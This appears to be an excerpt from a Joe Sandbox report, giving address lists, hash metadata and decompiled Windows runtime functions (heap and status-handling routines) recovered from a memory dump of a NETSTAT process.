0x02e929fa
0x02e92a97
0x02e92a9a
0x02e92a9d
0x02e92add
0x00000000
0x02e92a9f
0x02e92aa2
0x02e92aa5
0x02e92aa8
0x02e92aab
0x02ed5cab
0x02ed5caf
0x02ed5cc5
0x02ed5cda
0x02ed5cdc
0x02ed5cdf
0x02ed5ce5
0x00000000
0x02ed5ceb
0x02ed5ced
0x02ed5cee
0x00000000
0x02ed5cee
0x02ed5cb1
0x02ed5cb4
0x02ed5cb9
0x02ed5cbb
0x00000000
0x02ed5cbd
0x02ed5cbd
0x00000000
0x02ed5cbd
0x02ed5cbb
0x02e92ab1
0x02e92ab1
0x02e92ac4
0x02e92ac6
0x02e92ac6
0x00000000
0x02e92ac6
0x02e92aab
0x00000000
0x02e92a00
0x02e92a09
0x02e92a0e
0x02e92a21
0x02e92a24
0x02e92a35
0x02e92a3a
0x02e92a3d
0x02e92a42
0x02e92a59
0x02e92a59
0x02e92a5c
0x02e92a5f
0x02e92a5f
0x02e929fa
0x02e929f3
0x02e92a64
0x02e92a64
0x02e92a6b
0x02e92a6b
0x02e92a6d
0x02e92a72
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc8e20665d3b42a794148300ea02ab40930a1cc48054296982b8b2739df86a9
Instruction ID: 732dfc026e61246759de3d589f9a07c5d0d515a106d63cd33ea3f12072467e38
Opcode Fuzzy Hash: 8cc8e20665d3b42a794148300ea02ab40930a1cc48054296982b8b2739df86a9
Instruction Fuzzy Hash: 78514772980209EFDF25DF54C880ADEBBB6BF48318F05D056EE04AB260C3759952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E94BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02E94BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x2f5d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E02E6CC50(_t86);
					L11:
					return E02EAB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x2f58504
				E02E82280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E02EAFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E02EAB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L02E84620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E02E6CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x2f58504
								E02E7FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E02E94F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x02e94bad
0x02e94bbf
0x02e94bc2
0x02e94bc6
0x02e94bcd
0x02e94bd9
0x02ed67fe
0x02ed6800
0x02e94ccc
0x02e94ccd
0x02e94cb7
0x02e94cc9
0x02e94cc9
0x02e94bdf
0x02e94be5
0x00000000
0x00000000
0x02e94beb
0x02e94bef
0x00000000
0x00000000
0x02e94bf5
0x02e94bf9
0x02e94c06
0x02e94c0b
0x02e94c17
0x02e94c1c
0x02e94c1f
0x02e94c25
0x02e94c33
0x02e94c3d
0x02e94c40
0x02e94c43
0x02e94c47
0x02e94c4d
0x02e94c53
0x02e94c54
0x02e94c55
0x02e94c56
0x02e94c5b
0x02e94c5c
0x02e94c63
0x02e94c6b
0x00000000
0x00000000
0x02ed6776
0x02ed6784
0x02ed6784
0x02ed679f
0x02ed67a7
0x02ed67af
0x02ed67ce
0x00000000
0x02ed67b1
0x02ed67b7
0x02ed67b8
0x02ed67c1
0x02ed67d3
0x02ed67d9
0x02ed67dd
0x02e94c94
0x02e94c94
0x02e94c98
0x02e94c9c
0x02e94ca3
0x02ed67f4
0x02ed67f4
0x02e94cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x02e94cb5
0x02e94c79
0x02e94c7e
0x02e94c89
0x02e94c8b
0x02e94c8f
0x02e94c8f
0x00000000
0x02e94c89
0x02ed67c3
0x00000000
0x02ed67c3
0x02ed67af
0x02e94c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a8f348a750660ada9131bf73b8c3d777e203989db938b17c60febee3cb4c98
Instruction ID: 1940cc87f66157f8cff41411ec6632ca8a0f07589fae9130c7799faff5606c49
Opcode Fuzzy Hash: f7a8f348a750660ada9131bf73b8c3d777e203989db938b17c60febee3cb4c98
Instruction Fuzzy Hash: 2C41A135A8022C9FDF20DF64C940BEA77B9EF45704F0190A6E908AB240DB349E81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E94D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E02E94D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x2f5d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E02EAFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x2f57bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E02EAB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L02E84620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E02E6CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E02EAB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E02EAF380(_t67 + 0xc, 0x2e45138, 0x10) == 0) {
								 *0x2f560d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E02E94F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E02E94E70(0x2f586b0, 0x2e95690, 0, 0) != 0) {
					_t46 = E02E6CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x02e94d3b
0x02e94d4d
0x02e94d53
0x02e94d58
0x02e94d65
0x02e94d6c
0x02e94d71
0x02e94d77
0x02e94d7f
0x02e94d8c
0x02e94d8e
0x02e94dad
0x02e94db0
0x02e94db7
0x02e94db8
0x02e94db9
0x02e94dba
0x02e94dbb
0x02e94dc1
0x02e94dc8
0x02e94dcc
0x02e94dd5
0x02e94dde
0x02e94ddf
0x02e94de0
0x02e94de1
0x02e94de6
0x02e94de7
0x02e94de9
0x02e94df3
0x00000000
0x00000000
0x02ed6c7c
0x02ed6c8a
0x02ed6c8a
0x02ed6c9d
0x02ed6ca7
0x02ed6cac
0x02ed6cb2
0x02ed6cb9
0x00000000
0x02ed6cbf
0x02ed6cbf
0x00000000
0x02ed6cbf
0x02ed6cb9
0x02e94dfb
0x02ed6ccf
0x02ed6cd3
0x02e94e32
0x02e94e39
0x02ed6ce0
0x02ed6cf2
0x02ed6cf2
0x02ed6ce0
0x02e94e3f
0x02e94e41
0x02e94e51
0x02e94e51
0x02e94e03
0x02e94e03
0x02e94e09
0x02e94e0f
0x02e94e57
0x00000000
0x00000000
0x02e94e1b
0x02e94e30
0x02e94e5b
0x02e94e5b
0x00000000
0x02e94e30
0x02e94e11
0x02e94e11
0x02e94e16
0x00000000
0x02e94e16
0x02e94e01
0x00000000
0x02e94e01
0x02e94da5
0x02ed6c6b
0x00000000
0x02e94dab
0x02e94dab
0x00000000
0x02e94dab

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7912cc16a616a77a94da86c5f7d9f8551b78adfb2f8d4c5f87d24f148c78cb52
Instruction ID: 2f31e55cb66dafaa982706346d43060ba1134ceee79d95fb3de73acfab692e20
Opcode Fuzzy Hash: 7912cc16a616a77a94da86c5f7d9f8551b78adfb2f8d4c5f87d24f148c78cb52
Instruction Fuzzy Hash: 8F41D475AC03189FEF21DF14CC80FABB7AAEB45718F04949AE9499B280D770DD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02F2AA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F2AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E02F2ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E02F2AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E02F2AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E02F0CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L02E877F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E02E87D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02F2131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E02F0CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x02f2aa1f
0x02f2aa21
0x02f2aa23
0x02f2aa2b
0x02f2aa30
0x02f2aa36
0x02f2aa39
0x02f2aa42
0x02f2aa75
0x02f2aa7a
0x02f2aa7c
0x02f2aa7c
0x02f2aa88
0x02f2aa8a
0x02f2aa8f
0x02f2ab02
0x02f2ab04
0x02f2aa99
0x02f2aaa8
0x02f2aaaf
0x02f2aab3
0x02f2aacc
0x02f2aad1
0x02f2aad6
0x02f2aae0
0x02f2aaf3
0x02f2aaf9
0x02f2aafe
0x02f2aafe
0x02f2aaf3
0x02f2aad6
0x02f2aab3
0x02f2ab07
0x02f2ab0a
0x02f2ab11
0x02f2ab23
0x02f2ab13
0x02f2ab1c
0x02f2ab1c
0x02f2ab2b
0x02f2ab44
0x02f2ab44
0x02f2ab51
0x02f2ab51
0x02f2aa44
0x02f2aa47
0x02f2aa4c
0x00000000
0x00000000
0x02f2aa5a
0x02f2aa64
0x02f2aa72
0x00000000
0x02f2aa66
0x02f2aa66
0x02f2aa68
0x02f2aa6a
0x00000000
0x02f2aa6a

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 9ddc16aa6e2f139b750c139600f9d027e5c0e3328bf5794cf666213f953eb70c
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 46312432F00124ABDB158B69CC44BBFF7BBEF86390F058069EA04A7281DB70CD08CA50

Uniqueness

Uniqueness Score: -1.00%

Function 02E78A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02E78A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x2f5d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E02EAB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E02E7E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x2e41180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E02E91DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E02EA3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E02E78999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x02e78a0a
0x02e78a1c
0x02e78a23
0x02e78a2e
0x02e78a30
0x02e78a36
0x02e78a3c
0x02e78a3e
0x02e78a4a
0x02e78a52
0x02e78a9c
0x02e78aae
0x02e78a58
0x02e78a5e
0x02e78a6a
0x02e78a6f
0x02e78a75
0x02e78a7d
0x02e78a85
0x02e78a86
0x02e78a89
0x02e78a93
0x02e78a99
0x02e78a9b
0x00000000
0x02e78aaf
0x02e78abe
0x02e78ac3
0x02e78acb
0x02e78ad7
0x02e78ae0
0x02e78af1
0x00000000
0x02e78af1
0x02e78acd
0x02e78ad5
0x02e78afb
0x02e78afd
0x02e78aff
0x02e78b07
0x02e78b22
0x02e78b24
0x02e78b2a
0x02e78b2e
0x02e78b3f
0x02e78b78
0x02e78b41
0x02e78b52
0x02e78b54
0x02e78b5c
0x02e78b74
0x02e78b74
0x02e78b5c
0x02e78b3f
0x02e78b5e
0x02e78b61
0x02e78b64
0x02e78b64
0x02e78b6c
0x02e78b6c
0x02e78b11
0x02ec9cd5
0x02ec9cd5
0x02e78b17
0x02e78b1a
0x02e78b1a
0x00000000
0x02e78ad5
0x02e78a89

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a282bd403d0d013e9cc1076d78cb0c3abcbbe0198f96709007022b22b0dd6b9
Instruction ID: 9f889c884ca76a0bfc9a2b383bb597dff033556956368ead541e350413dd4ba6
Opcode Fuzzy Hash: 6a282bd403d0d013e9cc1076d78cb0c3abcbbe0198f96709007022b22b0dd6b9
Instruction Fuzzy Hash: 7B4171B4A8022C9BDB64DF55C89CBE9B3B5EB54304F1095EAE81997241E7709E80DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02F2FDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02F2FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E02F2FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E02F30A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E02E87D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E02F21608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E02F32B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E02F2C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E02F2DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E02E87D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E02F2A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x02f2fde7
0x02f2fde8
0x02f2fdec
0x02f2fdee
0x02f2fdf5
0x02f2fdf7
0x02f2fdfc
0x02f2fe19
0x02f2fe22
0x02f2fe26
0x02f2fec6
0x02f2fecd
0x02f2fed5
0x02f2fee7
0x02f2fed7
0x02f2fee0
0x02f2fee0
0x02f2feef
0x02f2ff00
0x02f2ff02
0x02f2ff07
0x02f2ff07
0x00000000
0x02f2feef
0x02f2fe33
0x02f2fe55
0x02f2fe59
0x02f2fe5b
0x02f2fe5e
0x02f2fe69
0x02f2fe6d
0x02f2fe6d
0x02f2fe69
0x02f2fe35
0x02f2fe41
0x02f2fe41
0x02f2fe79
0x02f2fe8b
0x02f2fe7b
0x02f2fe84
0x02f2fe84
0x02f2fe93
0x00000000
0x02f2fea8
0x02f2feba
0x00000000
0x02f2feba
0x02f2fdfe
0x02f2fe01
0x02f2fe02
0x02f2fe08
0x02f2ff0c
0x02f2ff14
0x02f2ff14

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: ebba5da101bcfda492ea39f4d186d9317841d2a3e18da145257ec776858bbb58
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 7F311832710A506FD322D768CC44F6BB7B6EB87790F184258E64A8BB45DB74DC49CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02F2EA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E02F2EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E02E82280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E02F2E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E02E6F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E02E7FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E02F2AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E02F2BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E02E87D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E02F1FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E02E7FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E02F2A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x02f2ea55
0x02f2ea66
0x02f2ea68
0x02f2ea6c
0x02f2ea6f
0x02f2ea72
0x02f2ea75
0x02f2ea7a
0x02f2ea7a
0x02f2ea7e
0x02f2ea80
0x02f2ea85
0x02f2ea8b
0x02f2eab5
0x02f2eabc
0x02f2eabf
0x02f2eabf
0x02f2eaca
0x02f2eace
0x02f2ead0
0x02f2eae4
0x02f2eaeb
0x02f2eaf0
0x02f2eaf5
0x02f2eb09
0x02f2eb0d
0x02f2eb1d
0x02f2eb2d
0x02f2eb38
0x02f2eb3d
0x02f2eb41
0x02f2eb4a
0x02f2eb60
0x02f2eb4c
0x02f2eb52
0x02f2eb59
0x02f2eb59
0x02f2eb68
0x02f2eb71
0x02f2eb71
0x02f2ea8d
0x02f2ea8f
0x02f2ea92
0x02f2ea97
0x02f2ea97
0x02f2ea9b
0x02f2ea9c
0x02f2ea9e
0x02f2eaa6
0x02f2eaa6
0x02f2eb7e

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 64bd5d5fc67499279fdd28fd3e45b95ebeb4f7a9fc01c70eeeb1ba61ac22428c
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 8F31A3726047159BC719DF24CC80A6BB7EAFBC1350F14892DF69687640EF30E819CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02EE69A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

